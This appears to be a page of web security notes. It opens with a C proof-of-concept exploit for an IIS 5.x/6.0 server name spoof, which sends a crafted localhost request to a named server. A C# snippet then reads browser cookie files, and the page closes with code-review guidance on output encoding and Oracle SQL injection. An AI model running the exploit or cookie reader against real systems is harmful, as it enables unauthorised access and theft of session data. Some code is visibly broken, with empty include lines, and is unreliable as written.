Code to read the information of the hosted server

#include
#include
//#include
#include


#pragma comment(lib,"ws2_32.lib")
//max size to socket buffer
#define LEN_BUF 2048
//socket status
#define Conectado 1868



//int main(array ^args)

void main(int argc, char *argv[])
{
/*connect to a host throught a port*/
int Conecta(char *Host, short puerto);
//socket from the connection
int socket;
//to get the data received
char buf[LEN_BUF];
FILE *data;

printf("\n Proof of Concept");
printf("\n IIS 5.x and IIS 6.0 Server Name Spoof - by Lympex");
printf("\nContact: lympex[at]gmail[dot]com - http://l-bytes.tk");
printf("\n----------------------------------------------------\n");

if(argc!=4)
{
printf("\n[+] Usage: %s server.com 80 /test.asp\n",argv[0]);return;
}

//conectamos
socket=Conecta(argv[1],(short)atoi(argv[2]));

if(socket==-1)
{
printf("\n[+] Error connecting to host\n");
return;
}printf("\n[+] Connected!\n");

if((data=fopen("received_data.txt","w"))==NULL)
{
printf("\n[+] Error saving received data\n");
WSACleanup();
return;
}

/*send the EVIL REQUEST*/
strcpy(buf,"GET http://localhost");strcat(buf,argv[3]);strcat(buf," HTTP/1.0\n\n");
send(socket,buf,strlen(buf),0);

//while we aren?t disconnected
do
{
buf[recv(socket,buf,LEN_BUF,0)]='\0';
fputs(buf,data);
}while(socket==Conectado);

WSACleanup();
fclose(data);
printf("\n[+] Received data, saved in: \x22received_data.txt\x22\n");
return;
}

/*Connect to a host throught a port - by Lympex*/
int Conecta(char *Host, short puerto)
{
/*para crear el socket*/
WSADATA wsaData;
SOCKET Winsock;//el que escucha
/*estructura con los datos para realizar la conexion*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;

/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

//miramos si est? correcto, y as? no rellenamos la estructura Winsock_In para nada
if(Winsock==INVALID_SOCKET)
{
/*salimos*/
WSACleanup();
return -1;
}

/*rellenamos la estructura*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(puerto);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

/*conectamos*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*salimos*/
WSACleanup();
return -1;
}

return Winsock;
}

Reading Cookie

private void button1_Click(object sender, EventArgs e)
{
/* working code
string path = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
System.Diagnostics.Process prc = new System.Diagnostics.Process();
string windir = Environment.GetEnvironmentVariable("WINDIR");
prc.StartInfo.FileName = windir + @"\explorer.exe";
prc.StartInfo.Arguments = path;
prc.Start();
working code
*
*/
string searchPattern = "*.txt";
string InitDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
ArrayList MyFiles = new ArrayList();
DirectoryInfo di = new DirectoryInfo(InitDirectory);
// Get Files
GetFiles(di, searchPattern, ref MyFiles);
//Print it
// use 123...for myfiles
StreamReader read = new StreamReader(MyFiles[4].ToString());
string st = read.ReadToEnd();
MessageBox.Show(st);
//foreach (string s in MyFiles)
//{
//}
}
private void GetFiles(DirectoryInfo di, string searchPattern, ref ArrayList MyFiles)
{
foreach (FileInfo fi in di.GetFiles(searchPattern))
{
MyFiles.Add(fi.FullName);
}
// Search in subdirctories
foreach (DirectoryInfo d in di.GetDirectories())
{
GetFiles(d, searchPattern, ref MyFiles);
}
}

Code Review Checks

Check That Output Is Encoded

While not a replacement for checking that input is well-formed and correct, you should check that HtmlEncode is used to encode HTML output that includes any type of input. Also check that UrlEncode is used to encode URL strings. Input data can come from query strings, form fields, cookies, HTTP headers, and input read from a database, particularly if the database is shared by other applications. By encoding the data, you prevent the browser from treating the HTML as executable script.

Example for url encoding

String MyURL;
MyURL = "http://www.contoso.com/articles.aspx?title=" + Server.UrlEncode("ASP.NET Examples");

Response.Write(" + MyURL + "> ASP.NET Examples ");

Check for Correct Character Encoding

To help prevent attackers using canonicalization and multi-byte escape sequences to trick your input validation routines, check that the character encoding is set correctly to limit the way in which input can be represented.

Check that the application Web.config file has set the requestEncoding and responseEncoding attributes configured by the element as shown below.

  
             requestEncoding="ISO-8859-1"
        responseEncoding="ISO-8859-1"/>
  

Oracle Injection Example

PreparedStatement
The PreparedStatement interface is used to execute dynamic SQL statements. The standard JDBC PreparedStatement interface may be used or the OraclePreparedStatement may be used if Oracle specific data types or other Oracle extensions are required.
A PreparedStatement that is vulnerable to SQL injection may look something like this –
String name = request.getParameter("name");
PreparedStatement pstmt =
conn.prepareStatement("insert into EMP (ENAME) values ('" + name + "')");
pstmt.execute();
pstmt.close();
To prevent SQL injection, a bind variable must be used –
PreparedStatement pstmt =
conn.prepareStatement ("insert into EMP (ENAME) values (?)");
String name = request.getParameter("name");
pstmt.setString (1, name);
pstmt.execute();
pstmt.close();

Sql Injection in Oracle

Oracle is like any other database product and, as a result, is vulnerable to SQL injection attacks. While Oracle fairs slightly better than some of the others, the following abuses can be inflicted on an Oracle database:

• UNIONS can be added to an existing statement to execute a second statement;
• SUBSELECTS can be added to existing statements;
• Existing SQL can be short-circuited to bring back all data. This technique is often used to gain access via third party-implemented authentication schemes;
• A large selection of installed packages and procedures are available, these include packages to read and write O/S files;
• Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string;
• INSERTS, UPDATES and DELETES can also be injected; and,
• Other databases can be injected through the first by using database links.

On the other hand, the following abuses are not possible:

• Multiple statements are not allowed; and,
• It is also not possible to SQL inject a call that uses bind variables; this is therefore a good solution to most of the SQL injection issues.

Web Security